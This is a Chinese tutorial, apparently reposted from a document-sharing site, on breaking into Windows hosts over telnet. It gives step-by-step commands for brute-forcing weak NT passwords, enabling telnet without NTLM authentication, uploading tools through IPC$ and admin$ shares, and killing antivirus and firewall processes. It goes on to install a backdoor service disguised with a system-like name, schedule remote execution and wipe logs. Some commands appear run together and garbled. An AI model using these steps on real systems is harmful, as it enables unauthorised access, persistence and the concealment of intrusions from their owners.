Telnet攻击总结.docx
《Telnet攻击总结.docx》由会员分享,可在线阅读,更多相关《Telnet攻击总结.docx(11页珍藏版)》请在冰豆网上搜索。
![Telnet攻击总结.docx](https://file1.bdocx.com/fileroot1/2023-2/2/62a3b46c-03cb-4b00-a7b1-f7e21404cb29/62a3b46c-03cb-4b00-a7b1-f7e21404cb291.gif)
Telnet攻击总结
Telnet攻击总结
概述:
telnet攻击呢!
说起来是非常简单的,可以形象的比喻成到“大户人家”盗窃嘛!
通过简单的实验希望可以帮助大家!
实验中应用的工具功能可能会有所重叠,实际环境中灵活使用就行了。
实验人:
飞鹭
实验工具:
NT-scan/X-scan:
扫描主机NT弱口令。
Opentelnet:
用来去除NTLM验证、开启telnet服务、修改telnet服务端口。
AProMan:
用来查看进程、杀死进程。
Instsrv和srvany:
用来给主机安装服务
Recton:
清除日志、开启telnet、远程重启、种植后门等!
实验拓扑:
实验介绍:
两台pc机直接相连,PC1:
192.168.0.109PC2:
192.168.0.106口令皆为:
administrator密码:
123
为了直观、形象的表现telnet攻击,上述实验环境为理想环境,现实中碰到这么弱口令的机会不是很多!
步骤一拿到钥匙
扫描有nt弱口令的主机,可用的工具有x-scan、nt-scan、fluxay,要知道口令相当于能开门的钥匙,有了别人家的钥匙,你就能肆无忌惮的进入别人“家里”,当然了,能不能得到这把钥匙就看你自己的运气了,碰见一个安全意识不强的主人家,你就
(发财喽!
)还有一定要注意“打枪的不要,悄悄的进行”言归正传,以X-scan为例,设置如下:
(1)X-scan主页面
(2)选择菜单栏中的“设置-扫描参数”或者直接点击工具栏中的“扫描参数”按钮,打开扫描参数设置,如图:
指定IP范围,此处根据实验环境填写192.168.0.106,若有其他需求请参考“示例”
(2)参数设置,选择要加载的扫描模块,使用此工具主要是获取远程主机的弱口令信息,所以只需要选择“NT-SERVER弱口令”即可,其余设置保持默认,点击确定,返回主页面。
(3)开始扫描,扫描完成,发现主机弱口令信息;扫描完成后,会自动生成并弹出html格式扫描报告,信息更加详细,此处不予展示。
步骤二钥匙开门
拿到弱口令后,使用opentelnet打开远程主机的Telnet服务,同时修改telnet服务端口并去除ntlm验证(至于什么是ntlm验证,我想“度娘”很乐意和你探讨一下的啦!
)
(1)下载opentelnet工具,解压缩,需要在dos模式下才能使用,本人的该工具位于桌面的soft文件夹里。
(2)开始-运行-输入cmd,找到opentelnet所在的目录。
(3)命令IP地址为192.168.0.108的主机去除ntlm认证,开启telnet服务,服务端口为90(默认为23,正因为众所周知,所以才不安全).
Opentelnet.exe\\192.168.0.108administrator123190
注:
开启过程中可能会遇到“Readntlmfailed”,解决办法在FAQ中提到。
(4)远程登录到主机
Telnet192.168.0.10390
步骤三准备狗粮(大户人家都是有看门狗的,拿点狗粮以防万一)
把所需文件上传到远程主机,主要是instsrv.exe和srvany.exe(安装服务)、Aproman.exe(杀灭进程),具体上传方法:
(1)与主机建立ipc$非空连接,此步骤的前提是主机口令已得知,并且远程主机开启了默认共享。
Netuse\\192.168.0.103\ipc$123/user:
administrator
(2)上传*.exe到远程主机,出现“改写.....吗?
”是因为小编我之前已经拷贝过了,下图以instsrv为例,其余文件的拷贝都是一个道理,但应注意拷贝到远程主机的系统安装目录中。
Copy*.exe\\192.168.0.103\admin$
步骤四打死看门狗:
不排除啊有看门狗不给面子的情况,为了自身安全,把看门狗弄死,煲汤!
登录远程主机,杀死远程主机的防火墙进程,先通过aproman.exe-a查看所有进程,找到杀毒防火墙的PID,然后aproman.exe-tpid来杀灭防火墙或者用netstop停止防火墙的服务
步骤五安插间谍(重中之重)
安装间谍,也就是这里咱们讲到的telnet服务,当然了最主要的不要和原先的一样,不然还有什么意义呢!
主要思想就是下次“串门”的时候,通过间谍策应,直接就进到主人家里
(1)远程登录到主机
(2)找到拷贝到远程主机程序的目录,此实验中为c:
\windows
(3)安装服务,服务名称尽量与系统服务名称相似,小编个人建议名称取长一些并混杂system之类大小写字眼,搅乱主人视线,实验中以SYS为例。
注:
小编在此处耽误了不少时间,读者一定要把instsrv和srvany两个程序拷贝到系统安装目录,instsrv只为安装服务,srvany是为了让程序以系统服务的格式启动,命令格式:
instsrv[自定义服务名称]c:
\windows\srvany.exe
(4)查看服务安装情况,是否已经安装
双击此服务,出现属性对话框,注意箭头所指路径
(5)安装完毕后,我们需要对srvany.exe进行配置,以便于能够加载我们指定的程序,配置的方法是,开始-运行-regedit,打开注册表,定位到下面的路径。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ServiceName
如果该服务名下没有Parameters项目,则对服务名称项目右击新建项,名称为Parameters,然后定位到Parameters项,新建以下几个字符串值。
名称Application值为你要作为服务运行的程序地址。
名称AppDirectory值为你要作为服务运行的程序所在文件夹路径。
名称AppParameters值为你要作为服务运行的程序启动所需要的参数。
如图:
(6)启动服务SYS,关闭原有telnet服务,重新登录看是否可以正常登录,若能正常登录,说明后门开启成功。
步骤六清除犯罪证据
(1)使用Recton工具清除日志,方便快捷
FAQ
1、使用opentelnet工具打开远程主机telnet服务时,提示“readNTLMfailed!
”
解决办法是去除主机NTLM验证!
具体步骤如下:
(1)与主机建立ipc$非空连接,此步骤的前提是主机口令已得知,并且主机开启了共享。
Netuse\\192.168.0.103\ipc$123/user:
administrator
(2)上传ntlm.exe到远程主机
Copyntlm.exe\\192.168.0.103\admin$
(3)定时执行ntlm.exe,执行后即可去除ntlm验证。
Nettime\\192.168.0.103查看远程主机当前时间
At\\192.168.0.1039:
39c:
\windows\ntlm.exe定时执行ntlm.exe
2、因为毕竟不可能直接在远程主机的桌面上操作,配置服务的过程有没有简便的方法?
解决办法:
当然还有一个比较简单的做法,那就是将下面的文本保存为*.reg文件,然后双击导入注册表。
WindowsRegistryEditorVersion5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\服务名称\Parameters]
"Application"="值为你要作为服务运行的程序地址"
"AppDirectory"="值为你要作为服务运行的程序所在文件夹路径"
"AppParameters"="值为你要作为服务运行的程序启动所需要的参数"
至此,SYS已经安装成windows服务了,在Window服务项中即可查看。